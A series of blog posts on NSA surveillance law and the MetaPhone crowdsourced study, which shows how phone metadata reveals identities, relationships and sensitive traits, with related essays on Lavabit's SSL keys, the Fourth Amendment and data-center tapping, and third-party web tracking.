On the other side, a number of computer scientists have expressed concern over the privacy risks posed by metadata. Ed Felten gave a particularly detailed explanation in a declaration for the ACLU: “Telephony metadata can be extremely revealing,” he wrote, “both at the level of individual calls and, especially, in the aggregate.” Holding the NSA’s program likely unconstitutional, Judge Leon credited this view and noted that “metadata from each person’s phone ‘reflects a wealth of detail about her familial, political, professional, religious, and sexual associations.’”

This is, at base, a factual dispute. Is it easy to draw sensitive inferences from phone metadata? How often do people conduct sensitive matters by phone, in a manner reflected by metadata?

We used crowdsourced data to arrive at empirical answers. Since November, we have been conducting a study of phone metadata privacy. Participants run the MetaPhone app on their Android smartphone; it submits device logs and social network information for analysis. In previous posts, we have used the MetaPhone dataset to spot relationships, understand call graph interconnectivity, and estimate the identifiability of phone numbers.

At the outset of this study, we shared the same hypothesis as our computer science colleagues—we thought phone metadata could be very sensitive. We did not anticipate finding much evidence one way or the other, however, since the MetaPhone participant population is small and participants only provide a few months of phone activity on average.

We were wrong. We found that phone metadata is unambiguously sensitive, even in a small population and over a short time window. We were able to infer medical conditions, firearm ownership, and more, using solely phone metadata.

Methodology

We began by identifying the MetaPhone participants’ contacts. We used the same approach as in our prior work on number identifiability, matching phone numbers against the public Yelp and Google Places directories. In total, our 546 participants contacted 33,688 unique numbers. 6,107 of those numbers (18%) resolved to an identity.

Next, we labeled the contacts that appeared related to a sensitive activity or trait. In most instances, an organization’s line of business was apparent from its name. Where there was ambiguity, we used simple Google queries to learn more.

We present two sets of results. First, we provide an analysis of individual calls to sensitive numbers. Second, we relate several patterns of calls to emphasize the detail available in telephone metadata.

Individual Call Results

Many organizations have a narrow purpose, such that an individual call gives rise to sensitive inferences. If a person reaches out to a political campaign, for example, it seems highly probable that the person supports the candidate. Similarly, if a person speaks at length with a religious institution, it appears likely that the person is of that faith. A further inference could also be made, that the person worships at that particular institution.

We found numerous calls within our dataset that give rise to these sorts of straightforward inferences. The following table presents the proportion of participants who had at least one call with each category of sensitive organization.

Category	Participants with ≥ 1 Calls
Health Services	57%
Financial Services	40%
Pharmacies	30%
Veterinary Services	18%
Legal Services	10%
Recruiting and Job Placement	10%
Religious Organizations	8%
Firearm Sales and Repair	7%
Political Officeholders and Campaigns	4%
Adult Establishments	2%
Marijuana Dispensaries	0.4%

The case of religious organizations gave us an opportunity to check the precision of our inferences. Since the MetaPhone app collects a user’s religion from his or her Facebook profile, we could compare phone metadata inferences against ground truth. There were 15 participants with both a well-defined religious status on Facebook (including atheism) and phone contact with a religious organization. Using just the naïve assumption that a person’s most-called religion is their own religion, we accurately identified the religious status of 11 of the 15 (73%).

Many numbers were associated with specialized products or services, particularly within professional fields. In medicine, for example, we were able to easily categorize phone numbers by specialty practice area.

Category	Participants with ≥ 1 Calls
Dentistry and Oral Health	18%
Mental Health and Family Services	8%
Ophthalmology and Optometry	6%
Sexual and Reproductive Health	6%
Pediatrics	5%
Orthopedics	4%
Chiropractic Care	3%
Rehabilitation and Physical Therapy	3%
Medical Laboratories	2%
Emergency or Urgent Care	2%
Cardiology	2%
Dermatology	1%
Ear, Nose, and Throat	1%
Neurology	1%
Oncology	1%
Substance Abuse	1%
Cosmetic Surgery	1%

The degree of sensitivity among contacts took us aback. Participants had calls with Alcoholics Anonymous, gun stores, NARAL Pro-Choice, labor unions, divorce lawyers, sexually transmitted disease clinics, a Canadian import pharmacy, strip clubs, and much more. This was not a hypothetical parade of horribles. These were simple inferences, about real phone users, that could trivially be made on a large scale.

Pattern Results

A pattern of calls will often, of course, reveal more than individual call records. During our analysis, we encountered a number of patterns that were highly indicative of sensitive activities or traits. The following examples are drawn directly from our dataset, using number identification through public resources. Though most MetaPhone participants consented to having their identity disclosed, we use pseudonyms in this report to protect participant privacy.

Participant A communicated with multiple local neurology groups, a specialty pharmacy, a rare condition management service, and a hotline for a pharmaceutical used solely to treat relapsing multiple sclerosis.
Participant B spoke at length with cardiologists at a major medical center, talked briefly with a medical laboratory, received calls from a pharmacy, and placed short calls to a home reporting hotline for a medical device used to monitor cardiac arrhythmia.
Participant C made a number of calls to a firearm store that specializes in the AR semiautomatic rifle platform. They also spoke at length with customer service for a firearm manufacturer that produces an AR line.
In a span of three weeks, Participant D contacted a home improvement store, locksmiths, a hydroponics dealer, and a head shop.
Participant E had a long, early morning call with her sister. Two days later, she placed a series of calls to the local Planned Parenthood location. She placed brief additional calls two weeks later, and made a final call a month after.

We were able to corroborate Participant B’s medical condition and Participant C’s firearm ownership using public information sources. Owing to the sensitivity of these matters, we elected to not contact Participants A, D, or E for confirmation.

Conclusion

The dataset that we analyzed in this report spanned hundreds of users over several months. Phone records held by the NSA and telecoms span millions of Americans over multiple years. Reasonable minds can disagree about the policy and legal constraints that should be imposed on those databases. The science, however, is clear: phone metadata is highly sensitive.

Advancing Empirical Legal Scholarship: State Materials

jonathan — Sun, 29 Dec 2013 22:19:11 +0000

Over the past year, I have shared various federal primary legal materials formatted in XML. The project’s focus has been enabling empirical legal scholarship with machine-readable government documents.

This final post is accompanied by state materials, including statutes, court opinions, regulations, and administrative rulings. I continue to welcome feedback from fellow researchers.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

Alabama: ZIP (484 MB)
Alaska: ZIP (118 MB)
Arizona: ZIP (218 MB)
Arkansas: ZIP (395 MB)
California: ZIP (1.14 GB)
Colorado: ZIP (328 MB)
Connecticut: ZIP (653 MB)
Delaware: ZIP (178 MB)
District of Columbia: ZIP (149 MB)
Florida: ZIP (849 MB)
Georgia: ZIP (428 MB)
Hawaii: ZIP (142 MB)
Idaho: ZIP (161 MB)
Illinois: ZIP (787 MB)
Indiana: ZIP (371 MB)
Iowa: ZIP (266 MB)
Kansas: ZIP (206 MB)
Kentucky: ZIP (230 MB)
Louisiana: ZIP (890 MB)
Maine: ZIP (111 MB)
Maryland: ZIP (390 MB)
Massachusetts: ZIP (421 MB)
Michigan: ZIP (366 MB)
Minnesota: ZIP (462 MB)
Mississippi: ZIP (287 MB)
Missouri: ZIP (523 MB)
Montana: ZIP (251 MB)
Nebraska: ZIP (218 MB)
Nevada: ZIP (133 MB)
New Hampshire: ZIP (138 MB)
New Jersey: ZIP (475 MB)
New Mexico: ZIP (190 MB)
New York: ZIP (2.40 GB)
North Carolina: ZIP (539 MB)
North Dakota: ZIP (125 MB)
Ohio: ZIP (880 MB)
Oklahoma: ZIP (435 MB)
Oregon: ZIP (358 MB)
Pennsylvania: ZIP (663 MB)
Rhode Island: ZIP (268 MB)
South Carolina: ZIP (192 MB)
South Dakota: ZIP (118 MB)
Tennessee: ZIP (406 MB)
Texas: ZIP (1.31 GB)
Utah: ZIP (194 MB)
Vermont: ZIP (103 MB)
Virginia: ZIP (254 MB)
Washington: ZIP (546 MB)
West Virginia: ZIP (196 MB)
Wisconsin: ZIP (334 MB)
Wyoming: ZIP (129 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

MetaPhone: The NSA’s Got Your Number

jonathan — Mon, 23 Dec 2013 15:47:14 +0000

Co-authored with Patrick Mutchler.

MetaPhone is a crowdsourced study of phone metadata. If you own an Android smartphone, please consider participating. In earlier posts, we reported how automated analysis of call and text activity can reveal private relationships, as well as how phone subscribers are closely interconnected.

“You have my telephone number connecting with your telephone number,” explained President Obama in a PBS interview. “[T]here are no names . . . in that database.”

Versions of this argument have appeared frequently in debates over the NSA’s domestic phone metadata program. The factual premise is that the NSA only compels disclosure of numbers, not names. One might conclude, then, that there isn’t much cause for privacy concern.

This line of reasoning has drawn sharp criticism. In a declaration for the ACLU, Ed Felten noted:

Although officials have insisted that the orders issued under the telephony metadata program do not compel the production of customers’ names, it would be trivial for the government to correlate many telephone numbers with subscriber names using publicly available sources. The government also has available to it a number of legal tools to compel service providers to produce their customer’s information, including their names.

When Judge Richard Leon granted a preliminary injunction against the program last week, he expressed a similar view:

The Government maintains that the metadata the NSA collects does not contain personal identifying information associated with each phone number, and in order to get that information the FBI must issue a national security letter (“NSL”) to the phone company. . . . Of course, NSLs do not require any judicial oversight . . . meaning they are hardly a check on potential abuses of the metadata collection. There is also nothing stopping the Government from skipping the NSL step altogether and using public databases or any of its other vast resources to match phone numbers with subscribers.

(Senator Dianne Feinstein issued a statement in response, reiterating that “no names” are coerced from the phone companies in bulk.)

So, just how easy is it to identify a phone number?

Trivial, we found. We randomly sampled 5,000 numbers from our crowdsourced MetaPhone dataset and queried the Yelp, Google Places, and Facebook directories. With little marginal effort and just those three sources—all free and public—we matched 1,356 (27.1%) of the numbers. Specifically, there were 378 hits (7.6%) on Yelp, 684 (13.7%) on Google Places, and 618 (12.3%) on Facebook.

What about if an organization were willing to put in some manpower? To conservatively approximate human analysis, we randomly sampled 100 numbers from our dataset, then ran Google searches on each. In under an hour, we were able to associate an individual or a business with 60 of the 100 numbers. When we added in our three initial sources, we were up to 73.

How about if money were no object? We don’t have the budget or credentials to access a premium data aggregator, so we ran our 100 numbers with Intelius, a cheap consumer-oriented service. 74 matched.¹ Between Intelius, Google search, and our three initial sources, we associated a name with 91 of the 100 numbers.

If a few academic researchers can get this far this quickly, it’s difficult to believe the NSA would have any trouble identifying the overwhelming majority of American phone numbers.

1. The results we obtained from Intelius were seemingly spottier than from Yelp, Google Places, and Facebook.

MetaPhone: The NSA Three-Hop

jonathan — Mon, 09 Dec 2013 17:03:13 +0000

Co-authored with Patrick Mutchler.

MetaPhone is a crowdsourced study of phone metadata. If you own an Android smartphone, please consider participating. In an earlier post, we reported how automated analysis of call and text activity can detect private relationships.

Does the National Security Agency have court authority to pore over your phone records? Quite possibly.

According to declassified documents, the NSA operates under a rote legal procedure for querying domestic phone metadata. The agency begins by identifying a “seed” number, with reasonable and articulable suspicion of terrorist activity.¹ Next, the NSA has discretion to follow up to three degrees of calling separation (“hops”).² The NSA is authorized to retrieve a complete set of phone records at each hop, and just one call in the past five years appears sufficient to make a hop.

Many observers have been deeply critical of this reach. By some estimates, a single seed number could establish authority to query phone records for thousands of Americans. Other estimates have counted into the millions.

A common approach for calculating these figures has been to simply assume an average number of call relationships per phone line (“degree”), then multiply out the number of hops. If a single phone number has average degree d, and the NSA can make h hops, then a single query gives expected access to about d^h complete sets of phone records.^{3, 4}

We turned to our crowdsourced MetaPhone dataset for an empirical measurement. Given our small, scattershot, and time-limited sample of phone activity, we expected our graph to be largely disconnected. After all, just one pair from our hundreds of participants had held a call.

Surprisingly, our call graph was connected. Over 90% of participants were related in a single graph component. And within that component, participants were closely linked: on average, over 10% of participants were just 2 hops away, and over 65% of participants were 4 or fewer hops away!

The reason, we found, is that the call graph does not solely resemble a diffuse social network. It also includes a hub-and-spoke structure, where many individuals are linked through well-known numbers.

The following figures illustrate this phenomenon with the MetaPhone call graph. Blue nodes reflect participants, red nodes indicate non-participant numbers, and gray edges connect call activity.

First, consider the graph of just the participants. Again, only one pair has held a call.

Now let’s add the most common non-participant number, which is for T-Mobile’s voicemail system.

Already 17.5% of participants are linked. That makes intuitive sense—many Americans use T-Mobile for mobile phone service, and many call into voicemail. Now think through the magnitude of the privacy impact: T-Mobile has over 45 million subscribers in the United States. That’s potentially tens of millions of Americans connected by just two phone hops, solely because of how their carrier happens to configure voicemail.

Let’s add additional frequent numbers.

Ever received a call from a Skype user?⁵ Authenticated your Google account by phone? You’re just two hops from everyone else in the same boat.

Note that phone spam is now in the mix. That’s especially troublesome for call graph connectivity, since the very purpose is to call as many numbers as possible. You’re just two hops from everyone else who’s been harassed about “cardmember services” or “your auto warranty.” (Hey, maybe the NSA should have competed in the FTC’s robocall challenge!)

You get the idea. Finally, here’s the entire call graph, omitting numbers called by just one participant.

So much for the notion that our crowdsourced call graph would be disconnected.

In thinking through the scope of NSA phone metadata authority, then, a simple d^h estimate does not tell the whole story. Calculations also have to account for the presence of high-degree hubs, which roughly map onto a power law.

What’s more, connections through high-degree hubs may be attenuated by a third hop. The discussion above focused on two-hop connections, where a hub merely links two numbers.

But a hub could also be one step removed from the seed.

Or one step removed from the user.

There is also the possibility of two hubs on a three-hop path from a seed to a user. Suppose, for example, that a suspicious number is phoned by a Skype user; a different Skype user has called FedEx; and you have phoned FedEx. You’re fair game.

The presence of hubs radically alters the connectivity of the phone graph. We resampled our data to estimate the reach of three hops, and consistently found that a majority of participant numbers would be included.⁶

So, what does all this mean for NSA watchers? The sample of MetaPhone participants is not representative of American phone use, and we do not know the properties of NSA seed numbers. We cannot, therefore, place statistically rigorous confidence bounds on our results. But our measurements are highly suggestive that many previous estimates of the NSA’s three-hop authority were conservative. Under current FISA Court orders, the NSA may be able to analyze the phone records of a sizable proportion of the United States population with just one seed number.

And by the way, there are tens of thousands of qualified seed numbers.

Many thanks to our advisors and colleagues for their invaluable input on this project. All views are solely our own.

1. For background, the reasonable and articulable suspicion standard is quite easy to satisfy— it’s the same basis for New York City’s controversial stop-and-frisk program. Also, between 2006 and 2009 the NSA failed to even meet the RAS standard for most of the seed numbers that it used.

2. We are not claiming that the NSA exercises this authority. We have no way of knowing, of course. FISA Court opinions indicate NSA technical staff may identify and ignore (“defeat”) high-degree numbers. But the opinions do not suggest the agency must do so. In fact, the FISC appears to view these efforts as an additional intrusion, since they involve analyzing the entire call database.

3. The NSA can also observe calls with a final hop number, such that d^h+1 numbers might be affected (but not have full call records revealed) in a single query. This extended analysis appears to be the basis of a widely cited figure that, if an average person has 40 contacts, then three hops are sufficient to reach 2.5 million numbers.

4. More precisely, if node degree is fixed at d, then the number of nodes within h hops is d^h + d^h-1 + . . . + 1 = (d^h+1 – 1) / (d – 1).

5. It appears that outbound Skype calls are, by default, placed from a small set of shared numbers.

6. Our call graph does not accurately reflect three-hop paths, since we do not have call records for the many non-participant numbers. We conducted a resampling analysis to account for this shortcoming, focusing on seed-spoke-hub-user paths. Over 10,000 iterations, we randomly selected a seed number from the participants. For high-degree neighbors, we simply followed two hops. For unknown neighbors, with probability .5, we randomly selected a new participant number and followed two hops over the high-degree neighbors.

MetaPhone: Seeing Someone?

jonathan — Wed, 27 Nov 2013 16:39:14 +0000

Co-authored with Patrick Mutchler.

Two weeks ago we kicked off the MetaPhone project, a crowdsourced study of phone metadata. Our aim is to inform policy and legal debates surrounding dragnet surveillance programs. We are exceedingly grateful to the hundreds of users who have joined. If you have not yet participated, you can still grab the MetaPhone app for Android.

Today we are excited to share some preliminary results: We can predict many romantic relationships. Automatically. Using solely phone metadata.

We began by dividing the problem into two parts. First, is a person in a relationship? If yes, then second, which number belongs to the person’s significant other?

The second problem, we quickly discovered, is much easier to solve. In our sample of individuals with significant others, the SO is the most-called number for over 60% of participants, and the most-texted number for over 70% of participants. Plenty of room for improvement, to be sure, but those simple features are a decent start.

Determining whether a user is in a relationship proved tricky. After some crash machine learning development, we were able to build a dating detector with good performance.

For those interested in the gory details: We began by selecting participants who provide a relationship status on Facebook. Individuals who were “Single” were labeled negative (no offense intended), and those who were “In a relationship,” “Engaged,” or “Married” were labeled positive. Next, we generated features from call and text patterns, including histograms of count and length. We used 10-fold cross-validation to generate training and testing splits and randomly upsampled training singles to account for participant imbalance. For each fold, we built a k-nearest neighbor classifier¹ from the training data and calculated a receiver operating characteristic curve over the testing data. Finally, we averaged the curves, as plotted below.

In less jargon: The graph reflects a tradeoff. We can get more individuals with significant others right, the vertical axis, in exchange for getting more singles wrong, the horizontal axis. This means, roughly, we can guess six in ten individuals with SOs right and get relatively few singles wrong. Or, if we accept getting one in three singles wrong, we can jump to getting over eight in ten individuals with SOs right.

The relationship statuses that we studied are not, by the way, volunteered to the general public. Only about one in four were configured to display to a stranger on Facebook, even though that’s the default.

These are, to emphasize, preliminary results. We will have more, better, and higher confidence findings as additional users (like you!) participate. We still have much more work ahead on the MetaPhone project. This is just a first, promising step towards confirmation of metadata’s importance.

Many thanks to our colleagues at Stanford and Princeton for their invaluable suggestions. All views are solely our own.

1. We set the number of neighbors at 5, the default in sklearn‘s implementation.

Saving Your Cryptographic Front Door

jonathan — Wed, 20 Nov 2013 18:00:21 +0000

Does the Fourth Amendment protect SSL keys? Not really, argues the executive branch in Lavabit’s appeal. “[A] business cannot prevent the execution of a search warrant by locking its front gate.”¹

True enough. But a business does have a constitutional right to keep that gate intact. When executing a warrant, officers must ordinarily announce themselves and afford an opportunity to open up.

This is not some quirk of jurisprudence. In Wilson v. Arkansas, the Supreme Court held unanimously that the “‘knock and announce’ principle forms a part of the reasonableness inquiry under the Fourth Amendment.” 514 U.S. 927, 939 (1995). That common law rule, the Court understood, traces its roots far back in the English legal tradition and “was woven quickly into the fabric of early American law.” Id. at 933.

Two years later, the Supreme Court held—again unanimously—that even felony drug busts can be subject to knock-and-announce. Richards v. Wisconsin, 520 U.S. 385 (1997). In the course of its opinion, the Court established the current constitutional standard for no-knock incursions.

In order to justify a “no-knock” entry, the police must have a reasonable suspicion that knocking and announcing their presence, under the particular circumstances, would be dangerous or futile, or that it would inhibit the effective investigation of the crime by, for example, allowing the destruction of evidence. Id. at 394.

If there’s a good reason, then, officers can break in. But, in general, “individuals should be provided the opportunity to comply with the law and to avoid the destruction of property occasioned by a forcible entry.” Id. at 393 n.5.

A cloud service should receive at least as much protection in its cryptographic front door. If not more—the service is an innocent bystander, compromised SSL keys are a devastating security breach, and the entire user population has interests at stake. When government officials lawfully demand user records, a cloud service should be given a reasonable opportunity to comply without forfeiting technical safeguards.

This position is informed as much by constitutional law as computer science. A cloud service usually can turn over user data without surrendering its front-end security.² SSL only protects information in transit; once data reaches the service, it is decrypted to plaintext. At that point, making a copy for law enforcement will usually be straightforward.³ Not trivial, necessarily, but hardly a feat of engineering.⁴ And the government would ordinarily compensate the cloud service for its efforts.⁵

The brief for the United States hints at willingness to accept this sort of constitutional compromise.⁶ “[I]n most cases, when government agents serve a provider with a pen/trap order, they are happy to let the provider use its own equipment and software to implement the order.” That includes keeping SSL keys secret.

Consider the implications of a more lenient rule. If a single mafioso uses Gmail, should that alone be sufficient to snag Google’s treasured SSL keys? Plainly not.

This middle-ground approach seems a pragmatic way for the courts to reconcile Internet security and law enforcement realities.⁷ It also suggests an outcome where Lavabit could lose—owing to its cavalier recalcitrance—but the Internet would still win substantial constitutional protections.

Disclaimer: I am not (yet!) a laywer. None of the above should be construed as legal advice.

1. Specifically, the United States appears to view SSL keys as mundane business records that are merely incidental to a compelled disclosure. Lavabit, the Electronic Frontier Foundation, and the American Civil Liberties Union argue cloud service SSL keys can never be demanded owing to various statutory and constitutional barriers. This post argues for a constitutional intermediate position between those absolutes.

2. Lavabit eventually offered a solution like this, which the government criticized as too little, too late, and too costly. In practice, the middle-ground solution proposed here would be a matter for negotiation between a cloud service and law enforcement. Where an agreement cannot be quickly reached, given the sensitivities surrounding SSL keys, it would be reasonable for the judiciary to mediate. (Contrast the approach for no-knock searches, where officers alone apply for a no-knock warrant or make a determination in the field.) Requiring a warrant specifically for SSL keys, like was issued in the Lavabit case, seems a sensible procedural safeguard.

3. My argument here is limited to services that already acquire the plaintext of user activity. If a company only has ciphertext (and no key), there would be reengineering required to negate security measures. That is a much more questionable matter of law and policy. In the Communications Assistance to Law Enforcement Act (CALEA), for example, Congress expressly exempted services of the sort: “A telecommunications carrier shall not be responsible for decrypting, or ensuring the government’s ability to decrypt, any communication encrypted by a subscriber or customer, unless the encryption was provided by the carrier and the carrier possesses the information necessary to decrypt the communication.” 47 U.S.C. § 1002.

4. Out of curiosity, I took on the toy example of a realtime pen/trace for a web application using Apache over HTTPS. I assumed the target user had a unique cookie, and I used mod_setenvif and mod_log_config to write a custom log for the target user’s activity at a secret URL. It took less than half an hour.

5. In the Lavabit case, the government challenged the firm’s estimate of engineering cost. That argument only arose, however, after Lavabit had waited for weeks and appeared uncooperative to law enforcement.

6. If pressed, the United States would presumably frame this as a voluntary procedure and not a constitutional requirement. It would likely also contest the duration of delay, scope of judicial supervision, and substantive standard for compelled disclosure of SSL keys.

7. Lavabit’s appeal sloshes with incidental issues, including argument forfeiture and questionable conduct. It is therefore quite possible the Fourth Circuit will not even reach the merits.

What’s In Your Metadata?

jonathan — Wed, 13 Nov 2013 18:27:38 +0000

Original at Stanford CIS.

Co-authored with Patrick Mutchler. This is a project of the Stanford Security Lab.

We’re studying the National Security Agency, and we need your help.

The NSA has confirmed that it collects American phone records. Defenders of the program insist it has little privacy impact and is “not surveillance.”

Like many computer scientists, we strongly disagree. Phone metadata is inherently revealing. We want to rigorously prove it—for the public, for Congress, and for the courts.

That’s where you come in. We’re crowdsourcing the data for our study. We’ll measure how much of your Facebook information can be inferred from your phone records.

Participation takes just a few minutes. You’re eligible if you’re in the United States, use an Android smartphone, and have a Facebook account.

To get started, grab the MetaPhone app from Google Play.

Why Data Center Tapping is (Legally) Different

jonathan — Thu, 07 Nov 2013 19:45:38 +0000

Last week the Washington Post broke news that the National Security Agency has collected international traffic between Google and Yahoo data centers. I happened to be delivering a course lecture on signals intelligence the same day, so I made brief mention of the program—and how it appears particularly aggressive under the Fourth Amendment.

A sharp student pressed for specifics. How, he asked, could data center tapping be more legally questionable than previously leaked surveillance initiatives? This post is an expanded and refined version of my response.

In short: The firms evade Fourth Amendment pitfalls of citizenship, personal interest, and metadata. They also have enough evidence to establish standing. Finally, the NSA would have difficulty demonstrating that its surveillance was reasonable.

The parties to the communications are known to be United States corporations, which are entitled to Fourth Amendment protection against unreasonable searches.

Google and Yahoo are unambiguously protected by the Fourth Amendment. The Supreme Court has consistently held for over a century that American corporations have a constitutional right to privacy against government searches. Hale v. Henkel, 201 U.S. 43 (1906). And “every Court of Appeals to have considered the question” has held that “the Fourth Amendment applies to searches conducted by the United States Government against United States citizens abroad.” United States v. Verdugo-Urquidez, 494 U.S. 259, 283 n.9 (1990) (Brennan, J., dissenting). I am not aware of any authority suggesting that American corporations relinquish their Fourth Amendment rights merely by operating overseas, and I would be surprised to hear the executive branch argue as much.

The companies were not, to be sure, necessarily entitled to the full panoply of Fourth Amendment protections. Corporations generally have narrower privacy rights than individuals. United States v. Morton Salt Co., 338 U.S. 632 (1950). Both the Second and Seventh Circuits have held that extraterritorial searches are exempt from the Warrant Clause. In re Terrorist Bombings of U.S. Embassies in East Afr. (Fourth Amendment Challenges), 552 F.3d 157 (2d Cir. 2008); United States v. Stokes, 726 F.3d 880 (7th Cir. 2013). And the Foreign Intelligence Surveillance Court of Review has fashioned a foreign intelligence exception to the warrant requirement. In re Directives [Redacted] Pursuant to Section 105B of the Foreign Intelligence Surveillance Act [Yahoo Challenge], No. 08-01 (FISA Ct. Rev., Aug. 22, 2008). Even if all these caveats apply, however, the Fourth Amendment baseline remains: intercepts of Google and Yahoo data center traffic cannot be “unreasonable.”

Contrast all this with the PRISM and upstream surveillance programs, where at least one party to a communication is believed to be a foreign citizen outside the United States. No public court has adjudicated the constitutionality of that targeting; the Electronic Frontier Foundation’s litigation has been pending for seven years. Whatever one’s views of the merits, there are undeniably some arguments for sustaining the PRISM and upstream programs: The Supreme Court held in Verdugo that foreigners outside the nation’s borders are not covered by the Fourth Amendment, and Congress enacted the underlying surveillance authority in the FISA Amendments Act of 2008. Both the Foreign Intelligence Surveillance Court and the Foreign Intelligence Surveillance Court of Review have apparently found those arguments persuasive. Google and Yahoo skirt these issues, since they are American corporations.

Since Google and Yahoo were communicating with themselves, they maintained their Fourth Amendment interest.

Under current Supreme Court doctrine, Fourth Amendment rights are personal in nature. See, e.g., Rakas v. Illinois, 439 U.S. 128 (1978). Google and Yahoo can only assert a constitutional privacy claim if they retain a sufficient stake in electronic communications or records.

It would be challenging for the firms to establish enough personal interest in upstream surveillance. For example, imagine a foreign Gmail users sends an email to a foreign Yahoo mail user, and the NSA intercepts the message in transit. If Google or Yahoo were to claim a Fourth Amendment violation, the government would assuredly challenge their interests as too attenuated. Google had put the message out of its possession and Yahoo did not yet possess the message; the message was in a standard format that did not reflect proprietary information from either firm; and the message was transiting the public Internet.

Contesting the PRISM program would raise similar issues about insufficient privacy interests. When the government serves a FISA Amendments Act Section 702 order on a cloud service, it demands user data, not the service’s own data.

The companies might be able to raise Fourth Amendment claims on behalf of their users. In fact, the Foreign Intelligence Surveillance Court of Review allowed Yahoo to proceed with just such a challenge to PRISM. Yahoo Challenge. Claims of this sort, however, devolve into claims about communications involving non-U.S. persons. As noted above, that continues to be a constitutional gray area.

Google and Yahoo can avoid this entire morass by asserting their own constitutional privacy rights. When they sent messages between their own data centers, they never plausibly forfeited their Fourth Amendment interest and protection.

The argument is even stronger where the firms used dedicated lines. As a matter of longstanding Fourth Amendment doctrine, physical property rights (e.g. a residence or business complex) are generally sufficient to establish constitutional privacy rights. See, e.g., Dow Chemical Co. v. United States, 476 U.S. 227, 234-39 (1986). Google or Yahoo might be able to fashion data center intercepts as a trespass on their leased infrastructure, physical property in which they assuredly hold a Fourth Amendment interest.

Google and Yahoo sent themselves content, not metadata.

Some of the NSA’s surveillance programs rest on the legal theory that metadata is exempt from Fourth Amendment coverage. The argument generally goes that Smith v. Maryland, 442 U.S. 735 (1979), and its progeny render metadata outside constitutional guarantees; the counterargument generally goes that Smith applied to a specific defendant and technology, and is inconsistent with opinions in the more recent United States v. Jones, 132 S. Ct. 945 (2012). Orin Kerr and Jennifer Granick have written a particularly detailed exposition of this debate.

Google and Yahoo once again fall outside the familiar surveillance law tussle. They sent content (i.e. proprietary instructions and records) between their data centers, not just metadata.

What’s more, even if the firms had just sent metadata, United States v. Jones would provide a path forward. 132 S. Ct. 945 (2012). In that case, the Supreme Court sidestepped precedent that indicated public movements (much like metadata) are categorically exempt from the Fourth Amendment. Instead, the Court ruled that a Fourth Amendment search occurs where there is a trespass plus “an attempt to . . . obtain information.” 132 S. Ct. at 952 n.5. Google and Yahoo could cite intrusion on their leased lines as trespass, and the NSA was plainly seeking information.

Leaked materials provide a sufficient evidentiary basis for standing.

To challenge a government surveillance program,¹ a plaintiff has to establish that its communications have been intercepted, have been targeted, or are about to be targeted. Clapper v. Amnesty Int’l USA, 133 S. Ct. 1138 (2013). Foreign organizations and individuals would have difficulty meeting the threshold. For Google and Yahoo, the front page of the Washington Post should suffice.

Data center intercepts were objectively unreasonable.

Having cleared the various Fourth Amendment prerequisites, Google and Yahoo would finally have to establish that the NSA’s data center surveillance was unreasonable. I think they have a strong argument: Congress expressly fashioned a convenient, subpoena-like method for the NSA to obtain user data. It need only serve Google or Yahoo with an FAA 702 order. No judicial preclearance. No probable cause. And yet, the agency sidestepped this statutory authority and captured data center traffic. While the NSA may have had lawful access to the underlying user data (ambiguous), the agency also unnecessarily snagged associated Google and Yahoo data. The Fourth Amendment does not require the government to use the least intrusive means for executing a search. See Skinner v. Railway Labor Executives’ Ass’n, 489 U.S. 602, 629 n.9 (1989). But when a substantially less intrusive means is readily available, and that alternative has been crafted by Congress in near-total capitulation to agency requests,² an end run sure seems excessive.

Parting Thoughts

On Sunday, Eric Schmidt told the Wall Street Journal that NSA data center tapping was “outrageous” and that Google had complained to the executive and legislative branches. Maybe that’s the most response we’ll see—maybe Google and Yahoo will not invoke the judicial branch. Even so, from a legal perspective, the data center revelation is a game changer. First, we now know an instance of unambiguously unconstitutional NSA conduct that apparently went undetected until media coverage. That’s yet another blow for claims of rigorous agency oversight. Second, we now know an instance of unambiguously unconstitutional conduct under Executive Order 12333. Until recently, the focus of scrutiny was domestically conducted surveillance under FISA. Revelations about spying on data centers and foreign leaders have turned the spotlight towards EO 1333, the largely unregulated set of intelligence activities abroad. Effective intelligence reform efforts will necessarily have to go beyond FISA and address EO 12333.

Disclaimer: I am not (yet!) a laywer. None of the above should be construed as legal advice.

1. Just because a plaintiff lacks standing, by the way, does not mean the plaintiff’s constitutional rights have been respected. I mention standing because, in the area of foreign intelligence surveillance, it is a particularly substantial obstacle to litigation.

2. As explained in a leaked NSA Inspector General report, FAA 702 was a direct response to NSA requests for new warrantless surveillance authority.

The Web Is Flat

jonathan — Wed, 30 Oct 2013 14:03:20 +0000

Consider this a bug report for the National Security Agency and its overseers. Dragnet online surveillance may be directed at international activity. But it nonetheless ensnares ordinary Americans as they browse domestic websites.

The spy outfit admits to vacuuming vast quantities of network traffic as it passes through the United States. Some taps are on the nation’s borders; others are on the domestic Internet backbone. International partner agencies, most prominently the UK’s Government Communications Headquarters, contribute to the NSA’s reach. Recent leaks have provided substantial detail: Under the Marina program, the agency appears to retain web browsing activity for a year.¹ The XKeyscore system offers at least one way for analysts at the NSA and cooperating services to efficiently query both historical and realtime data.

Agency apologists are quick to point out that the snooping has limits. The NSA only acquires online communications when a sender or recipient seems international. Doing otherwise might, in their view, violate congressional restrictions or constitutional protections.

Tough luck for foreigners. But if you’re within the United States, the notion goes, you don’t have much cause for concern.

That’s wrong. Americans routinely send personal data outside the country. They just might not know it.

Here’s an example: From approximately mid-August through mid-October, the House of Representatives website was not entirely “Made in the USA.” What you read was shared with a business in London.²

When you loaded a House webpage, your browser began by chatting up Akamai, a prolific and speedy web hosting service. Scant surprise there.³

As the page progressed, your browser was instructed to load some code provided by a company named Texthelp. The House’s aim was praiseworthy; Texthelp software assists individuals who have difficulty reading.

The House website in early October. A green arrow indicates the Texthelp feature.

Texthelp is, however, incorporated in and operated from the United Kingdom. When your browser schmoozed with the Brits, it passed along a “referrer”—a technical tipoff about the page that you’re reading.⁴

GET /Detect.ashx HTTP/1.1
Host: babm.texthelp.com
. . .
Origin: http://house.gov
. . .
Referer: http://house.gov/legislative/date/2013-10-4
. . .

So there’s the general problem. A person within the United States may be reading a webpage that looks, and is, as American as apple pie. But that webpage can pull in dozens of unexpected sources—advertising companies, analytics services, and social networks, among others. If just one of those third parties is international, your browsing activity could be swept into the NSA’s dragnet.^{5, 6}

